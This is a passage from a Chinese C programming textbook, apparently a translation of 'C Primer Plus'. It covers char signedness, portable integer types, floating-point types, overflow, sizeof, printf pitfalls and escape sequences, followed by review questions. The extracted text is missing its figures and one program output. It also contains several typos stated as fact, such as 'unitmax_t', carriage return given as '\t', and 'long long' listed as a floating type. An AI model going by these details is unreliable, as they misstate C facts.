运行该程序时,在输入字母后不要忘记按下Enter或Return键。随后, scanf()函数会读取用户输入的字符,&符号表示把输入的字符赋给变量ch。 接着,printf()函数打印ch的值两次,第1次打印一个字符(对应代码中 的%c),第2次打印一个十进制整数值(对应代码中的%d)。注意,printf() 函数中的转换说明决定了数据的显示方式,而不是数据的储存方式(见图 3.6)。 图3.6 数据显示和数据存储 5.有符号还是无符号 有些C编译器把char实现为有符号类型,这意味着char可表示的范围 是-128~127。而有些C编译器把char实现为无符号类型,那么char可表示的 范围是0~255。请查阅相应的编译器手册,确定正在使用的编译器如何实现 char类型。或者,可以查阅limits.h头文件。下一章将详细介绍头文件的内 容。 根据C90标准,C语言允许在关键字char前面使用signed或unsigned。这 139 样,无论编译器默认char是什么类型,signed char表示有符号类型,而 unsigned char表示无符号类型。这在用char类型处理小整数时很有用。如果 只用char处理字符,那么char前面无需使用任何修饰符。 3.4.4 _Bool类型 C99标准添加了_Bool类型,用于表示布尔值,即逻辑值true和false。因 为C语言用值1表示true,值0表示false,所以_Bool类型实际上也是一种整数 类型。但原则上它仅占用1位存储空间,因为对0和1而言,1位的存储空间足 够了。 程序通过布尔值可选择执行哪部分代码。我们将在第6章和第7章中详述 相关内容。 3.4.5 可移植类型:stdint.h和inttypes.h C 语言提供了许多有用的整数类型。但是,某些类型名在不同系统中的 功能不一样。C99 新增了两个头文件stdint.h和inttypes.h,以确保C语言的类 型在各系统中的功能相同。 C语言为现有类型创建了更多类型名。这些新的类型名定义在stdint.h头 文件中。例如,int32_t表示32位的有符号整数类型。在使用32位int的系统 中,头文件会把int32_t作为int的别名。不同的系统也可以定义相同的类型 名。例如,int为16位、long为32位的系统会把int32_t作为long的别名。然 后,使用int32_t类型编写程序,并包含stdint.h头文件时,编译器会把int或 long替换成与当前系统匹配的类型。 上面讨论的类型别名是精确宽度整数类型(exact-width integer type)的 示例。int32_t表示整数类型的宽度正好是32位。但是,计算机的底层系统可 能不支持。因此,精确宽度整数类型是可选项。 如果系统不支持精确宽度整数类型怎么办?C99和C11提供了第2类别名 集合。一些类型名保证所表示的类型一定是至少有指定宽度的最小整数类 140 型。这组类型集合被称为最小宽度类型(minimum width type)。例如, int_least8_t是可容纳8位有符号整数值的类型中宽度最小的类型的一个别 名。如果某系统的最小整数类型是16位,可能不会定义int8_t类型。尽管如 此,该系统仍可使用int_least8_t类型,但可能把该类型实现为16位的整数类 型。 当然,一些程序员更关心速度而非空间。为此,C99和C11定义了一组 可使计算达到最快的类型集合。这组类型集合被称为最快最小宽度类型 (fastst minimum width type)。例如,int_fast8_t被定义为系统中对8位有符号 值而言运算最快的整数类型的别名。 另外,有些程序员需要系统的最大整数类型。为此,C99定义了最大的 有符号整数类型intmax_t,可储存任何有效的有符号整数值。类似地, unitmax_t表示最大的无符号整数类型。顺带一提,这些类型有可能比long long和unsigned long类型更大,因为C编译器除了实现标准规定的类型以外, 还可利用C语言实现其他类型。例如,一些编译器在标准引入 long long 类型 之前,已提前实现了该类型。 C99 和 C11 不仅提供可移植的类型名,还提供相应的输入和输出。例 如,printf()打印特定类型时要求与相应的转换说明匹配。如果要打印int32_t 类型的值,有些定义使用%d,而有些定义使用%ld,怎么办?C 标准针对这 一情况,提供了一些字符串宏(第 4 章中详细介绍)来显示可移植类型。例 如, inttypes.h头文件中定义了PRId32字符串宏,代表打印32位有符号值的合 适转换说明(如d或l)。程序清单3.6演示了一种可移植类型和相应转换说 明的用法。 程序清单3.6 altnames.c程序 /* altnames.c -- 可移植整数类型名 */ #include <stdio.h> #include <inttypes.h> // 支持可移植类型 141 int main(void) { int32_t me32;   // me32是一个32位有符号整型变量 me32 = 45933945; printf("First, assume int32_t is int: "); printf("me32 = %d\n", me32); printf("Next, let's not make any assumptions.\n"); printf("Instead, use a \"macro\" from inttypes.h: "); printf("me32 = %" PRId32 "\n", me32); return 0; } 该程序最后一个printf()中,参数PRId32被定义在inttypes.h中的"d"替换, 因而这条语句等价于: printf("me16 = %" "d" "\n", me16); 在C语言中,可以把多个连续的字符串组合成一个字符串,所以这条语 句又等价于: printf("me16 = %d\n", me16); 下面是该程序的输出,注意,程序中使用了\"转义序列来显示双引号: First, assume int32_t is int: me32 = 45933945 Next, let's not make any assumptions. 
142 Instead, use a "macro" from inttypes.h: me32 = 45933945 篇幅有限,无法介绍扩展的所有整数类型。本节主要是为了让读者知 道,在需要时可进行这种级别的类型控制。附录B中的参考资料VI“扩展的 整数类型”介绍了完整的inttypes.h和stdint.h头文件。 注意 对C99/C11的支持 C语言发展至今,虽然ISO已发布了C11标准,但是编译器供应商对C99 的实现程度却各不相同。在本书第6版的编写过程中,一些编译器仍未实现 inttypes.h头文件及其相关功能。 3.4.6 float、double和long double 各种整数类型对大多数软件开发项目而言够用了。然而,面向金融和数 学的程序经常使用浮点数。C语言中的浮点类型有float、double和long double 类型。它们与FORTRAN和Pascal中的real类型一致。前面提到过,浮点类型 能表示包括小数在内更大范围的数。浮点数的表示类似于科学记数法(即用 小数乘以10的幂来表示数字)。该记数系统常用于表示非常大或非常小的 数。表3.3列出了一些示例。 表3.3 记数法示例 第1列是一般记数法;第2列是科学记数法;第3列是指数记数法(或称 为e记数法),这是科学记数法在计算机中的写法,e后面的数字代表10的指 数。图3.7演示了更多的浮点数写法。 C标准规定,float类型必须至少能表示6位有效数字,且取值范围至少是 10-37~10+37。前一项规定指float类型必须至少精确表示小数点后的6位有效 143 数字,如33.333333。后一项规定用于方便地表示诸如太阳质量(2.0e30千 克)、一个质子的电荷量(1.6e-19库仑)或国家债务之类的数字。通常, 系统储存一个浮点数要占用32位。其中8位用于表示指数的值和符号,剩下 24位用于表示非指数部分(也叫作尾数或有效数)及其符号。 图3.7 更多浮点数写法示例 C语言提供的另一种浮点类型是double(意为双精度)。double类型和 float类型的最小取值范围相同,但至少必须能表示10位有效数字。一般情况 下,double占用64位而不是32位。一些系统将多出的 32 位全部用来表示非 指数部分,这不仅增加了有效数字的位数(即提高了精度),而且还减少了 舍入误差。另一些系统把其中的一些位分配给指数部分,以容纳更大的指 数,从而增加了可表示数的范围。无论哪种方法,double类型的值至少有13 位有效数字,超过了标准的最低位数规定。 C语言的第3种浮点类型是long double,以满足比double类型更高的精度 要求。不过,C只保证long double类型至少与double类型的精度相同。 144 1.声明浮点型变量 浮点型变量的声明和初始化方式与整型变量相同,下面是一些例子: float noah, jonah; double trouble; float planck = 6.63e-34; long double gnp; 2.浮点型常量 在代码中,可以用多种形式书写浮点型常量。浮点型常量的基本形式 是:有符号的数字(包括小数点),后面紧跟e或E,最后是一个有符号数 表示10的指数。下面是两个有效的浮点型常量: -1.56E+12 2.87e-3 正号可以省略。可以没有小数点(如,2E5)或指数部分(如, 19.28),但是不能同时省略两者。可以省略小数部分(如,3.E16)或整数 部分(如,.45E-6),但是不能同时省略两者。下面是更多的有效浮点型常 量示例: 3.14159 .2 4e16 .8E-5 100. 145 不要在浮点型常量中间加空格:1.56 E+12(错误!) 默认情况下,编译器假定浮点型常量是double类型的精度。例如,假设 some是float类型的变量,编写下面的语句: some = 4.0 * 2.0; 通常,4.0和2.0被储存为64位的double类型,使用双精度进行乘法运 算,然后将乘积截断成float类型的宽度。这样做虽然计算精度更高,但是会 减慢程序的运行速度。 在浮点数后面加上f或F后缀可覆盖默认设置,编译器会将浮点型常量看 作float类型,如2.3f和9.11E9F。使用l或L后缀使得数字成为long double类 型,如54.3l和4.32L。注意,建议使用L后缀,因为字母l和数字1很容易混 淆。没有后缀的浮点型常量是double类型。 C99 标准添加了一种新的浮点型常量格式——用十六进制表示浮点型常 量,即在十六进制数前加上十六进制前缀(0x或0X),用p和P分别代替e和 E,用2的幂代替10的幂(即,p计数法)。如下所示: 0xa.1fp10 十六进制a等于十进制10,.1f是1/16加上15/256(十六进制f等于十进制 15),p10是210或1024。0xa.1fp10表示的值是(10 + 1/16 + 15/256)×1024(即,十进制10364.0)。 注意,并非所有的编译器都支持C99的这一特性。 3.打印浮点值 printf()函数使用%f转换说明打印十进制记数法的float和double类型浮点 数,用%e打印指数记数法的浮点数。如果系统支持十六进制格式的浮点 数,可用a和A分别代替e和E。打印long double类型要使用%Lf、%Le或%La 转换说明。给那些未在函数原型中显式说明参数类型的函数(如,printf()) 146 传递参数时,C编译器会把float类型的值自动转换成double类型。程序清单 3.7演示了这些特性。 程序清单3.7 showf_pt.c程序 /* showf_pt.c -- 以两种方式显示float类型的值 */ #include <stdio.h> int main(void) { float aboat = 32000.0; double abet = 2.14e9; long double dip = 5.32e-5; printf("%f can be written %e\n", aboat, aboat); // 下一行要求编译器支持C99或其中的相关特性 printf("And it's %a in hexadecimal, powers of 2 notation\n",  aboat); printf("%f can be written %e\n", abet, abet); printf("%Lf can be written %Le\n", dip, dip); return 0; } 该程序的输出如下,前提是编译器支持C99/C11: 32000.000000 can be written 3.200000e+04 147 And it's 0x1.f4p+14 in hexadecimal, powers of 2 notation 2140000000.000000 can be written 2.140000e+09 0.000053 can be written 5.320000e-05 该程序示例演示了默认的输出效果。下一章将介绍如何通过设置字段宽 度和小数位数来控制输出格式。 4.浮点值的上溢和下溢 假设系统的最大float类型值是3.4E38,编写如下代码: float toobig = 3.4E38 * 100.0f; printf("%e\n", toobig); 会发生什么?这是一个上溢(overflow)的示例。当计算导致数字过 大,超过当前类型能表达的范围时,就会发生上溢。这种行为在过去是未定 义的,不过现在C语言规定,在这种情况下会给toobig赋一个表示无穷大的 特定值,而且printf()显示该值为inf或infinity(或者具有无穷含义的其他内 容)。 当除以一个很小的数时,情况更为复杂。回忆一下,float类型的数以指 数和尾数部分来储存。存在这样一个数,它的指数部分是最小值,即由全部 可用位表示的最小尾数值。该数字是float类型能用全部精度表示的最小数 字。现在把它除以 2。通常,这个操作会减小指数部分,但是假设的情况 中,指数已经是最小值了。所以计算机只好把尾数部分的位向右移,空出第 1 个二进制位,并丢弃最后一个二进制数。以十进制为例,把一个有4位有 效数字的数(如,0.1234E-10)除以10,得到的结果是0.0123E-10。虽然得 
到了结果,但是在计算过程中却损失了原末尾有效位上的数字。这种情况叫 作下溢(underflow)。C语言把损失了类型全精度的浮点值称为低于正常的 (subnormal)浮点值。因此,把最小的正浮点数除以 2将得到一个低于正常 的值。如果除以一个非常大的值,会导致所有的位都为0。现在,C库已提 148 供了用于检查计算是否会产生低于正常值的函数。 还有另一个特殊的浮点值NaN(not a number的缩写)。例如,给asin() 函数传递一个值,该函数将返回一个角度,该角度的正弦就是传入函数的 值。但是正弦值不能大于1,因此,如果传入的参数大于1,该函数的行为是 未定义的。在这种情况下,该函数将返回NaN值,printf()函数可将其显示为 nan、NaN或其他类似的内容。 浮点数舍入错误 给定一个数,加上1,再减去原来给定的数,结果是多少?你一定认为 是1。但是,下面的浮点运算给出了不同的答案: /* floaterr.c--演示舍入错误 */ #include <stdio.h> int main(void) { float a,b; b = 2.0e20 + 1.0; a = b - 2.0e20; printf("%f \n", a); return 0; } 该程序的输出如下: 149 得出这些奇怪答案的原因是,计算机缺少足够的小数位来完成正确的运 算。2.0e20是 2后面有20个0。如果把该数加1,那么发生变化的是第21位。 要正确运算,程序至少要储存21位数字。而float类型的数字通常只能储存按 指数比例缩小或放大的6或7位有效数字。在这种情况下,计算结果一定是错 误的。另一方面,如果把2.0e20改成2.0e4,计算结果就没问题。因为2.0e4 加1只需改变第5位上的数字,float类型的精度足够进行这样的计算。 浮点数表示法 上一个方框中列出了由于计算机使用的系统不同,一个程序有不同的输 出。原因是,根据前面介绍的知识,实现浮点数表示法的方法有多种。为了 尽可能地统一实现,电子和电气工程师协会(IEEE)为浮点数计算和表示 法开发了一套标准。现在,许多硬件浮点单元都采用该标准。2011年,该标 准被ISO/IEC/IEEE 60559:2011标准收录。该标准作为C99和C11的可选项, 符合硬件要求的平台可开启。floaterr.c程序的第3个输出示例即是支持该浮 点标准的系统显示的结果。支持C标准的编译器还包含捕获异常问题的工 具。详见附录B.5,参考资料V。 3.4.7 复数和虚数类型 许多科学和工程计算都要用到复数和虚数。C99 标准支持复数类型和虚 数类型,但是有所保留。一些独立实现,如嵌入式处理器的实现,就不需要 使用复数和虚数(VCR芯片就不需要复数)。一般而言,虚数类型都是可选 项。C11标准把整个复数软件包都作为可选项。 简而言之,C语言有3种复数类型:float_Complex、double_Complex和 long double _Complex。例如,float _Complex类型的变量应包含两个float类型 的值,分别表示复数的实部和虚部。类似地, C语言的3种虚数类型是float _Imaginary、double _Imaginary和long double _Imaginary。 150 如果包含complex.h头文件,便可用complex代替_Complex,用imaginary 代替_Imaginary,还可以用I代替-1的平方根。 为何 C 标准不直接用 complex 作为关键字来代替_Complex,而要添加 一个头文件(该头文件中把complex定义为_Complex)?因为标准委员会考 虑到,如果使用新的关键字,会导致以该关键字作为标识符的现有代码全部 失效。例如,之前的 C99,许多程序员已经使用 struct complex 定义一个结 构来表示复数或者心理学程序中的心理状况(关键字struct用于定义能储存 多个值的结构,详见第14章)。让complex成为关键字会导致之前的这些代 码出现语法错误。但是,使用struct _Complex的人很少,特别是标准使用首 字母是下划线的标识符作为预留字以后。因此,标准委员会选定_Complex 作为关键字,在不用考虑名称冲突的情况下可选择使用complex。 3.4.8 其他类型 现在已经介绍完C语言的所有基本数据类型。有些人认为这些类型实在 太多了,但有些人觉得还不够用。注意,虽然C语言没有字符串类型,但也 能很好地处理字符串。第4章将详细介绍相关内容。 C语言还有一些从基本类型衍生的其他类型,包括数组、指针、结构和 联合。尽管后面章节中会详细介绍这些类型,但是本章的程序示例中已经用 到了指针〔指针(pointer)指向变量或其他数据对象位置〕。例如,在 scanf()函数中用到的前缀&,便创建了一个指针,告诉 scanf()把数据放在何 处。 小结:基本数据类型 关键字: 基本数据类型由11个关键字组成:int、long、short、unsigned、char、 float、double、signed、_Bool、_Complex和_Imaginary。 有符号整型: 151 有符号整型可用于表示正整数和负整数。 int ——系统给定的基本整数类型。C语言规定int类型不小于16位。 short或short int ——最大的short类型整数小于或等于最大的int类型整 数。C语言规定short类型至少占16位。 long或long int ——该类型可表示的整数大于或等于最大的int类型整数。 C语言规定long类型至少占32位。 long long或long long int ——该类型可表示的整数大于或等于最大的long 类型整数。Long long类型至少占64位。 一般而言,long类型占用的内存比short类型大,int类型的宽度要么和 long类型相同,要么和short类型相同。例如,旧DOS系统的PC提供16位的 short和int,以及32位的long;Windows 95系统提供16位的short以及32位的int 和long。 无符号整型: 无符号整型只能用于表示零和正整数,因此无符号整型可表示的正整数 比有符号整型的大。在整型类型前加上关键字unsigned表明该类型是无符号 整型:unsignedint、unsigned long、unsigned short。单独的unsigned相当于 unsignedint。 字符类型: 可打印出来的符号(如A、&和+)都是字符。根据定义,char类型表示 一个字符要占用1字节内存。出于历史原因,1字节通常是8位,但是如果要 表示基本字符集,也可以是16位或更大。 char ——字符类型的关键字。有些编译器使用有符号的char,而有些则 使用无符号的char。在需要时,可在char前面加上关键字signed或unsigned来 指明具体使用哪一种类型。 152 布尔类型: 布尔值表示true和false。C语言用1表示true,0表示false。 _Bool ——布尔类型的关键字。布尔类型是无符号 int类型,所占用的空 间只要能储存0或1即可。 实浮点类型: 实浮点类型可表示正浮点数和负浮点数。 float ——系统的基本浮点类型,可精确表示至少6位有效数字。 double ——储存浮点数的范围(可能)更大,能表示比 float 类型更多 的有效数字(至少 10位,通常会更多)和更大的指数。 long long ——储存浮点数的范围(可能)比double更大,能表示比 double更多的有效数字和更大的指数。 复数和虚数浮点数: 虚数类型是可选的类型。复数的实部和虚部类型都基于实浮点类型来构 成: float _Complex double _Complex long double _Complex float _Imaginary double _Imaginary long long _Imaginary 153 小结:如何声明简单变量 1.选择需要的类型。 2.使用有效的字符给变量起一个变量名。 3.按以下格式进行声明: 类型说明符 变量名; 类型说明符由一个或多个关键字组成。下面是一些示例: int erest; unsigned short cash; 4.可以同时声明相同类型的多个变量,用逗号分隔各变量名,如下所 示: char ch, init, ans; 
5.在声明的同时还可以初始化变量: float mass = 6.0E24; 3.4.9 类型大小 如何知道当前系统的指定类型的大小是多少?运行程序清单3.8,会列 出当前系统的各类型的大小。 程序清单3.8 typesize.c程序 //* typesize.c -- 打印类型大小 */ #include <stdio.h> int main(void) 154 { /* C99为类型大小提供%zd转换说明 */ printf("Type int has a size of %zd bytes.\n", sizeof(int)); printf("Type char has a size of %zd bytes.\n", sizeof(char)); printf("Type long has a size of %zd bytes.\n", sizeof(long)); printf("Type long long has a size of %zd bytes.\n", sizeof(long long)); printf("Type double has a size of %zd bytes.\n", sizeof(double)); printf("Type long double has a size of %zd bytes.\n", sizeof(long double)); return 0; } sizeof是C语言的内置运算符,以字节为单位给出指定类型的大小。C99 和C11提供%zd转换说明匹配sizeof的返回类型[2]。一些不支持C99和C11的 编译器可用%u或%lu代替%zd。 该程序的输出如下: Type int has a size of 4 bytes. Type char has a size of 1 bytes. Type long has a size of 8 bytes. 155 Type long long has a size of 8 bytes. Type double has a size of 8 bytes. Type long double has a size of 16 bytes. 该程序列出了6种类型的大小,你也可以把程序中的类型更换成感兴趣 的其他类型。注意,因为C语言定义了char类型是1字节,所以char类型的大 小一定是1字节。而在char类型为16位、double类型为64位的系统中,sizeof 给出的double是4字节。在limits.h和float.h头文件中有类型限制的相关信息 (下一章将详细介绍这两个头文件)。 顺带一提,注意该程序最后几行 printf()语句都被分为两行,只要不在 引号内部或一个单词中间断行,就可以这样写。 156 3.5 使用数据类型 编写程序时,应注意合理选择所需的变量及其类型。通常,用int或float 类型表示数字,char类型表示字符。在使用变量之前必须先声明,并选择有 意义的变量名。初始化变量应使用与变量类型匹配的常数类型。例如: int apples = 3;    /* 正确 */ int oranges = 3.0;  /* 不好的形式 */ 与Pascal相比,C在检查类型匹配方面不太严格。C编译器甚至允许二次 初始化,但在激活了较高级别警告时,会给出警告。最好不要养成这样的习 惯。 把一个类型的数值初始化给不同类型的变量时,编译器会把值转换成与 变量匹配的类型,这将导致部分数据丢失。例如,下面的初始化: int cost = 12.99;   /* 用double类型的值初始化int类型的变量 */ float pi = 3.1415926536;  /* 用double类型的值初始化float类型的变量 */ 第1个声明,cost的值是12。C编译器把浮点数转换成整数时,会直接丢 弃(截断)小数部分,而不进行四舍五入。第2个声明会损失一些精度,因 为C只保证了float类型前6位的精度。编译器对这样的初始化可能给出警告。 读者在编译程序清单3.1时可能就遇到了这种警告。 许多程序员和公司内部都有系统化的命名约定,在变量名中体现其类 型。例如,用 i_前缀表示 int类型,us_前缀表示 unsigned short 类型。这样, 一眼就能看出来 i_smart 是 int 类型的变量, us_versmart是unsigned short类型 的变量。 157 3.6 参数和陷阱 有必要再次提醒读者注意 printf()函数的用法。读者应该还记得,传递 给函数的信息被称为参数。例如,printf("Hello, pal.")函数调用有一个参 数:"Hello,pal."。双引号中的字符序列(如,"Hello,pal.")被称为字符串 (string),第4章将详细讲解相关内容。现在,关键是要理解无论双引号中 包含多少个字符和标点符号,一个字符串就是一个参数。 与此类似,scanf("%d", &weight)函数调用有两个参数:"%d"和 &weight。C语言用逗号分隔函数中的参数。printf()和scanf()函数与一般函数 不同,它们的参数个数是可变的。例如,前面的程序示例中调用过带一个、 两个,甚至三个参数的 printf()函数。程序要知道函数的参数个数才能正常 工作。printf()和scanf()函数用第1个参数表明后续有多少个参数,即第1个字 符串中的转换说明与后面的参数一一对应。例如,下面的语句有两个%d转 换说明,说明后面还有两个参数: printf("%d cats ate %d cans of tuna\n", cats, cans); 后面的确还有两个参数:cats和cans。 程序员要负责确保转换说明的数量、类型与后面参数的数量、类型相匹 配。现在,C 语言通过函数原型机制检查函数调用时参数的个数和类型是否 正确。但是,该机制对printf()和scanf()不起作用,因为这两个函数的参数个 数可变。如果参数在匹配上有问题,会出现什么情况?假设你编写了程序清 单 3.9中的程序。 程序清单3.9 badcount.c程序 /* badcount.c -- 参数错误的情况 */ #include <stdio.h> int main(void) 158 { int n = 4; int m = 5; float f = 7.0f; float g = 8.0f; printf("%d\n", n, m);  /* 参数太多 */ printf("%d %d %d\n", n); /* 参数太少 */ printf("%d %d\n", f, g); /* 值的类型不匹配 */ return 0; } XCode 4.6(OS 10.8)的输出如下: 4 4 1 -706337836 1606414344 1 Microsoft Visual Studio Express 2012(Windows 7)的输出如下: 4 4 0 0 0 1075576832 注意,用%d显示float类型的值,其值不会被转换成int类型。在不同的 159 平台下,缺少参数或参数类型不匹配导致的结果不同。 所有编译器都能顺利编译并运行该程序,但其中大部分会给出警告。的 确,有些编译器会捕获到这类问题,然而C标准对此未作要求。因此,计算 机在运行时可能不会捕获这类错误。如果程序正常运行,很难觉察出来。如 果程序没有打印出期望值或打印出意想不到的值,你才会检查 printf()函数 中的参数个数和类型是否得当。 160 3.7 转义序列示例 再来看一个程序示例,该程序使用了一些特殊的转义序列。程序清单 3.10 演示了退格(\b)、水平制表符(\t)和回车(\t)的工作方式。这些概 念在计算机使用电传打字机作为输出设备时就有了,但是它们不一定能与现 代的图形接口兼容。例如,程序清单3.10在某些Macintosh的实现中就无法正 常运行。 程序清单3.10 escape.c程序 /* escape.c -- 使用转移序列 */ #include <stdio.h> int main(void) { float salary; printf("\aEnter your desired monthly salary:"); /* 1 */ printf(" $_______\b\b\b\b\b\b\b");        /* 2 
*/ scanf("%f", &salary); printf("\n\t$%.2f a month is $%.2f a year.", salary, salary * 12.0);              /* 3 */ printf("\rGee!\n");                /* 4 */ return 0; } 161 3.7.1 程序运行情况 假设在系统中运行的转义序列行为与本章描述的行为一致(实际行为可 能不同。例如,XCode 4.6把\a、\b和\r显示为颠倒的问号),下面我们来分 析这个程序。 第1条printf()语句(注释中标为1)发出一声警报(因为使用了\a),然 后打印下面的内容: Enter your desired monthly salary: 因为printf()中的字符串末尾没有\n,所以光标停留在冒号后面。 第2条printf()语句在光标处接着打印,屏幕上显示的内容是: Enter your desired monthly salary: $_______ 冒号和美元符号之间有一个空格,这是因为第2条printf()语句中的字符 串以一个空格开始。7个退格字符使得光标左移7个位置,即把光标移至7个 下划线字符的前面,紧跟在美元符号后面。通常,退格不会擦除退回所经过 的字符,但有些实现是擦除的,这和本例不同。 假设键入的数据是4000.00(并按下Enter键),屏幕显示的内容应该 是: Enter your desired monthly salary: $4000.00 键入的字符替换了下划线字符。按下Enter键后,光标移至下一行的起 始处。 第3条printf()语句中的字符串以\n\t开始。换行字符使光标移至下一行起 始处。水平制表符使光标移至该行的下一个制表点,一般是第9列(但不一 定)。然后打印字符串中的其他内容。执行完该语句后,此时屏幕显示的内 容应该是: 162 Enter your desired monthly salary: $4000.00 $4000.00 a month is $48000.00 a year. 因为这条printf()语句中没有使用换行字符,所以光标停留在最后的点号 后面。 第4条printf()语句以\r开始。这使得光标回到当前行的起始处。然后打印 Gee!,接着\n使光标移至下一行的起始处。屏幕最后显示的内容应该是: Enter your desired monthly salary: $4000.00 Gee! $4000.00 a month is $48000.00 a year. 3.7.2 刷新输出 printf()何时把输出发送到屏幕上?最初,printf()语句把输出发送到一个 叫作缓冲区(buffer)的中间存储区域,然后缓冲区中的内容再不断被发送 到屏幕上。C 标准明确规定了何时把缓冲区中的内容发送到屏幕:当缓冲区 满、遇到换行字符或需要输入的时候(从缓冲区把数据发送到屏幕或文件被 称为刷新缓冲区)。例如,前两个 printf()语句既没有填满缓冲区,也没有 换行符,但是下一条 scanf()语句要求用户输入,这迫使printf()的输出被发送 到屏幕上。 旧式编译器遇到scanf()也不会强行刷新缓冲区,程序会停在那里不显示 任何提示内容,等待用户输入数据。在这种情况下,可以使用换行字符刷新 缓冲区。代码应改为: printf("Enter your desired monthly salary:\n"); scanf("%f", &salary); 无论接下来的输入是否能刷新缓冲区,代码都会正常运行。这将导致光 标移至下一行起始处,用户无法在提示内容同一行输入数据。还有一种刷新 163 缓冲区的方法是使用fflush()函数,详见第13章。 164 3.8 关键概念 C语言提供了大量的数值类型,目的是为程序员提供方便。那以整数类 型为例,C认为一种整型不够,提供了有符号、无符号,以及大小不同的整 型,以满足不同程序的需求。 计算机中的浮点数和整数在本质上不同,其存储方式和运算过程有很大 区别。即使两个32位存储单元储存的位组合完全相同,但是一个解释为float 类型,另一个解释为long类型,这两个相同的位组合表示的值也完全不同。 例如,在PC中,假设一个位组合表示float类型的数256.0,如果将其解释为 long类型,得到的值是113246208。C语言允许编写混合数据类型的表达式, 但是会进行自动类型转换,以便在实际运算时统一使用一种类型。 计算机在内存中用数值编码来表示字符。美国最常用的是ASCII码,除 此之外C也支持其他编码。字符常量是计算机系统使用的数值编码的符号表 示,它表示为单引号括起来的字符,如'A'。 165 3.9 本章小结 C 有多种的数据类型。基本数据类型分为两大类:整数类型和浮点数类 型。通过为类型分配的储存量以及是有符号还是无符号,区分不同的整数类 型。最小的整数类型是char,因实现不同,可以是有符号的char或无符号的 char,即unsigned char或signed char。但是,通常用char类型表示小整数时才 这样显示说明。其他整数类型有short、int、long和long long类型。C规定,后 面的类型不能小于前面的类型。上述都是有符号类型,但也可以使用 unsigned关键字创建相应的无符号类型:unsigned short、unsigned int、 unsigned long和unsigned long long。或者,在类型名前加上signed修饰符显式 表明该类型是有符号类型。最后,_Bool类型是一种无符号类型,可储存0或 1,分别代表false和true。 浮点类型有3种:float、double和C90新增的long double。后面的类型应 大于或等于前面的类型。有些实现可选择支持复数类型和虚数类型,通过关 键字_Complex和_Imaginary与浮点类型的关键字组合(如,double _Complex 类型和float _Imaginary类型)来表示这些类型。 整数可以表示为十进制、八进制或十六进制。0前缀表示八进制数,0x 或0X前缀表示十六进制数。例如,32、040、0x20分别以十进制、八进制、 十六进制表示同一个值。l或L前缀表明该值是long类型, ll或LL前缀表明该 值是long long类型。 在C语言中,直接表示一个字符常量的方法是:把该字符用单引号括起 来,如'Q'、'8'和'$'。C语言的转义序列(如,'\n')表示某些非打印字符。另 外,还可以在八进制或十六进制数前加上一个反斜杠(如,'\007'),表示 ASCII码中的一个字符。 浮点数可写成固定小数点的形式(如,9393.912)或指数形式(如, 7.38E10)。C99和C11提供了第3种指数表示法,即用十六进制数和2的幂来 表示(如,0xa.1fp10)。 166 printf()函数根据转换说明打印各种类型的值。转换说明最简单的形式由 一个百分号(%)和一个转换字符组成,如%d或%f。 167 3.10 复习题 复习题的参考答案在附录A中。 1.指出下面各种数据使用的合适数据类型(有些可使用多种数据类 型): a.East Simpleton的人口 b.DVD影碟的价格 c.本章出现次数最多的字母 d.本章出现次数最多的字母次数 2.在什么情况下要用long类型的变量代替int类型的变量? 3.使用哪些可移植的数据类型可以获得32位有符号整数?选择的理由是 什么? 
4.指出下列常量的类型和含义(如果有的话): a.'\b' b.1066 c.99.44 d.0XAA e.2.0e30 5.Dottie Cawm编写了一个程序,请找出程序中的错误。 include <stdio.h> 168 main ( float g; h; float tax, rate; g = e21; tax = rate*g; ) 6.写出下列常量在声明中使用的数据类型和在printf()中对应的转换说 明: 7.写出下列常量在声明中使用的数据类型和在printf()中对应的转换说明 (假设int为16位): 169 8.假设程序的开头有下列声明: int imate = 2; long shot = 53456; char grade = 'A'; float log = 2.71828; 把下面printf()语句中的转换字符补充完整: printf("The odds against the %__ were %__ to 1.\n",  imate, shot); printf("A score of %__ is not an %__ grade.\n", log,  grade); 9.假设ch是char类型的变量。分别使用转义序列、十进制值、八进制字 符常量和十六进制字符常量把回车字符赋给ch(假设使用ASCII编码值)。 10.修正下面的程序(在C中,/表示除以)。 void main(int) / this program is perfect / { cows, legs integer; 170 printf("How many cow legs did you count?\n); scanf("%c", legs); cows = legs / 4; printf("That implies there are %f cows.\n", cows) } 11.指出下列转义序列的含义: a.\n b.\\ c.\" d.\t 171 3.11 编程练习 1.通过试验(即编写带有此类问题的程序)观察系统如何处理整数上 溢、浮点数上溢和浮点数下溢的情况。 2.编写一个程序,要求提示输入一个ASCII码值(如,66),然后打印 输入的字符。 3.编写一个程序,发出一声警报,然后打印下面的文本: Startled by the sudden sound, Sally shouted, "By the Great Pumpkin, what was that!" 4.编写一个程序,读取一个浮点数,先打印成小数点形式,再打印成指 数形式。然后,如果系统支持,再打印成p记数法(即十六进制记数法)。 按以下格式输出(实际显示的指数位数因系统而异): Enter a floating-point value: 64.25 fixed-point notation: 64.250000 exponential notation: 6.425000e+01 p notation: 0x1.01p+6 5.一年大约有3.156×107秒。编写一个程序,提示用户输入年龄,然后显 示该年龄对应的秒数。 6.1个水分子的质量约为3.0×10−23克。1夸脱水大约是950克。编写一个 程序,提示用户输入水的夸脱数,并显示水分子的数量。 7.1英寸相当于2.54厘米。编写一个程序,提示用户输入身高(/英 寸),然后以厘米为单位显示身高。 172 8.在美国的体积测量系统中,1品脱等于2杯,1杯等于8盎司,1盎司等 于2大汤勺,1大汤勺等于3茶勺。编写一个程序,提示用户输入杯数,并以 品脱、盎司、汤勺、茶勺为单位显示等价容量。思考对于该程序,为何使用 浮点类型比整数类型更合适? [1].欧美日常使用的度量衡单位是常衡盎司(avoirdupois ounce),而欧美黄 金市场上使用的黄金交易计量单位是金衡盎司(troy ounce)。国际黄金市 场上的报价,其单位“盎司”都指的是黄金盎司。常衡盎司属英制计量单位, 做重量单位时也称为英两。相关换算参考如下:1常衡盎司 = 28.350克,1金 衡盎司 = 31.104克,16常衡盎司 = 1磅。该程序的单位转换思路是:把磅换 算成金衡盎司,即28.350÷31.104×16=14.5833。——译者注 [2].即,size_t类型。——译者注 173 第4章 字符串和格式化输入/输出 本章介绍以下内容: 函数:strlen() 关键字:const 字符串 如何创建、存储字符串 如何使用strlen()函数获取字符串的长度 用C预处理器指令#define和ANSIC的const修饰符创建符号常量 本章重点介绍输入和输出。与程序交互和使用字符串可以编写个性化的 程序,本章将详细介绍C语言的两个输入/输出函数:printf()和scanf()。学会 使用这两个函数,不仅能与用户交互,还可根据个人喜好和任务要求格式化 输出。最后,简要介绍一个重要的工具——C预处理器指令,并学习如何定 义、使用符号常量。 174 4.1 前导程序 